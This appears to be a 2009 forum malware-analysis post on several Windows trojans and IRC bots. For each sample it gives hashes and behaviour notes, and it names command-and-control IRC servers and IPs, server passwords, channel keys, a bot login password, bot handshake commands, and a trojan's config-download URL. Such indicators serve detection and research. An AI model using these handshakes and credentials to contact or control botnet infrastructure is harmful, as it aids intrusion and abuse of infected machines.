Nickname format: [00|%[countrty]|OS|%[number 6]] (example: [00|USA|XP|189918] )

Code:

PASS HEHE
NICK [00|USA|XP|189918]
USER sxgxtfj * 0 :TEST
MODE [00|USA|XP|189918] +iR
JOIN #pstore# VrX

reptile.exe

Code:

File size: 38400 bytes
MD5...: 012f8be481d8523b45e9d67cdc1a2f20
SHA1..: b0c0c19e991d4671e23233128de39388171a4b6a
SHA256: 4a0cc4726322af0ef86882b4b34d2a409257188a5783e313679fec4b155e5b03
ssdeep: 768:nXO887OPsw72aMB0V1HU6oHfFnapQkDqLUwuwBBga1Z9pF6137wqYBvJ:1wOUwjpU6oHJaCHBBgUZI137wz

IRC bot that connects to irc://sik.totalunix.net:6969/##spread## , as shown above .

snp.exe

Code:

File size: 383066 bytes
MD5...: 671eefbc4c8edc2098a7379f8431ab35
SHA1..: 20338f56ae3b6d74f68de7cdfedf8049bfd8bc50
SHA256: e3a91eb27c49012490710bfb5b63998664a8e90be981ff74984e7730d1d386e8
ssdeep: 6144:qjUJiNMHrkLBer+NaGvTZgZMnNQHHMHHH9GGGGGGGGGGGGGGGGGGGGGGGGGGGGGi:PJ0krKS+z7ZgIZ8g/

Dropper for reptile.exe trojan (requires dotCrap framework, file saved: 954158reptile.exe) "Copyright � Thec0re 2009" .

soul.exe (compiled: F:\Uniq Callapibyname and RunPE Generator\D0LV9G.vbp )

Code:

File size: 90151 bytes
MD5...: 836bb93cd4b2b5754c73ab8b0c01e5df
SHA1..: b3857f7e604431cdc4f2281a6af51aaeea3f1860
SHA256: de6430ca2790602a7fdcf9e063df032fe5450b17b0cd0e95863cafd2e02e7649
ssdeep: 1536:+imVenXB+nxpT2khCmLNzcn9po32aqxwPivVdGQC15D33aenA:+xen0n2khCmpzc9pJaqWKQbD33nA

IRC server: cyber-gods.x0rg.com:6667 (93.190.143.50)
Channel: #c
Nickname format: [INF|%[countrty]|%[OS]|%[computername]|%[number 6]] (example: [INF|USA|XP|TEST|189918] )

Code:

NICK [INF|USA|XP|TEST|189918]
USER twizt * 0 :TEST
MODE [INF|USA|XP|TEST|189918] -ix
JOIN :#c

cyber-gods.x0rg.com:6667 wrote:

:001 get.lost
002 002 002
003 003 003
004 004 004
005 005 005
005 005 005
005 005 005
PING 422 MOTD

svchost.exe

Code:

This trojan copies itself as %systemroot%\sdra64.exe , it has a ring3 rootkit , and it tries to get a config file from http://secure-gov.com/picture/configs.bin (404 when I checked).

Sweet-Ogard.exe

Code:

File size: 13312 bytes
MD5...: 897b080dbad7f421c00a6d2a5a725339
SHA1..: 4dbebca5bdf7a2ab3ceae71b167e431b64eb7558
SHA256: 0f0982517bf4c423e2ffcf2b64ee50369673fac21718dc9b731f9f5e0b454dc4
ssdeep: 384:1XRAqDJFf/3VDxUnmJW6+aNZ/ZAnc5x7p:LA6Ff/3VDxUnd6+aNZ/uI

IRC bot that connects to irc://idem0.p0cetak.eu:5900/#FUCk# , as shown above.

unfud.exe

Code:

File size: 90000 bytes
MD5...: 704cecf2d87b1f82969c7297c23fcb6a
SHA1..: 68bba53b2c8a2bc5957b64eba02ba7bf6cd1fa22
SHA256: b121c3976cc27d42e690d295e79f828e07d769646204c9a7187609a7d356b033
ssdeep: 1536:VWG6qTWoK5cZIlHl3uFh2tYrGoXqVv2ObVdQWZHdPY9mv:VWG6pHRF+S3vtzldPqm

This should be a dropper for uNkbot.exe but it doesn't load because its PE headers were edited.

uNkbot.exe

Code:

File size: 45568 bytes
MD5...: 442241cd317180e90f88036aa1b89b0b
SHA1..: f1bfce26411310cfc8c51fe12f00036d1de77958
SHA256: 9ed08db21b896bf755767ffbcfa371e275d8bb25c90d8387ce4a7b69c1e31cce
ssdeep: 768:C+nwtwC5Hh0FdKkW1U6IhD3y4khSIb7+WNB5rWtajbMHX:BwtwC5BwKkW1U6IhrqHWKBB9jbW

This trojan works only after a restart (it saves itself as %windir%\h1t3m.exe but it tries to execute %windir%h1t3m.exe).

IRC server: mandown.homeip.net:5900 (81.229.71.165)
Server password: darksons
Channel: #unk
Channel key: uNkb0t
Nickname format: [00|%[countrty]|%[OS]%[number 6]] (example: [00|USA|XP|189918] )
Login password for bots: rewt

Code:

PASS darksons
NICK [00|USA|XP|189918]
USER sxgxtfj * 0 :TEST
MODE [00|USA|XP|189918] +ix
JOIN #unk uNkb0t

mandown.homeip.net:5900 wrote:

:irc.oc256.com NOTICE AUTH :*** Looking up your hostname...
:irc.oc256.com NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
PING :917DF3D2
:irc.oc256.com 001 [00|USA|XP|189918] :Welcome to the oc256 IRC Network [00|USA|XP|189918]!sxgxtfj@89.123.154.82
:irc.oc256.com 002 [00|USA|XP|189918] :Your host is irc.oc256.com, running version Unreal3.2.8.1
:irc.oc256.com 003 [00|USA|XP|189918] :This server was created Sun May 24 15:01:33 2009
:irc.oc256.com 004 [00|USA|XP|189918] irc.oc256.com Unreal3.2.8.1 iowghraAsORTVSxNCWqBzvdHtGp lvhopsmntikrRcaqOALQbSeIKVfMCuzNTGj
:irc.oc256.com 005 [00|USA|XP|189918] UHNAMES NAMESX SAFELIST HCN MAXCHANNELS=25 CHANLIMIT=#:25 MAXLIST=b:60,e:60,I:60 NICKLEN=30 CHANNELLEN=32 TOPICLEN=307 KICKLEN=307 AWAYLEN=307 MAXTARGETS=20 :are supported by this server
:irc.oc256.com 005 [00|USA|XP|189918] WALLCHOPS WATCH=128 WATCHOPTS=A SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(qaohv)~&@%+ CHANMODES=beI,kfL,lj,psmntirRcOAQKVCuzNSMTG NETWORK=oc256 CASEMAPPING=ascii EXTBAN=~,cqnr ELIST=MNUCT STATUSMSG=~&@%+ :are supported by this server
:irc.oc256.com 005 [00|USA|XP|189918] EXCEPTS INVEX CMDS=KNOCK,MAP,DCCALLOW,USERIP :are supported by this server
:irc.oc256.com 251 [00|USA|XP|189918] :There are 1 users and 526 invisible on 1 servers
:irc.oc256.com 252 [00|USA|XP|189918] 2 :operator(s) online
:irc.oc256.com 254 [00|USA|XP|189918] 6 :channels formed
:irc.oc256.com 255 [00|USA|XP|189918] :I have 527 clients and 0 servers
:irc.oc256.com 265 [00|USA|XP|189918] :Current Local Users: 527 Max: 4087
:irc.oc256.com 266 [00|USA|XP|189918] :Current Global Users: 527 Max: 4087
:irc.oc256.com 375 [00|USA|XP|189918] :- irc.oc256.com Message of the Day -
:irc.oc256.com 372 [00|USA|XP|189918] :- 27/7/2009 18:27
:irc.oc256.com 372 [00|USA|XP|189918] :- d
:irc.oc256.com 376 [00|USA|XP|189918] :End of /MOTD command.
:[00|USA|XP|189918] MODE [00|USA|XP|189918] :+i

____________________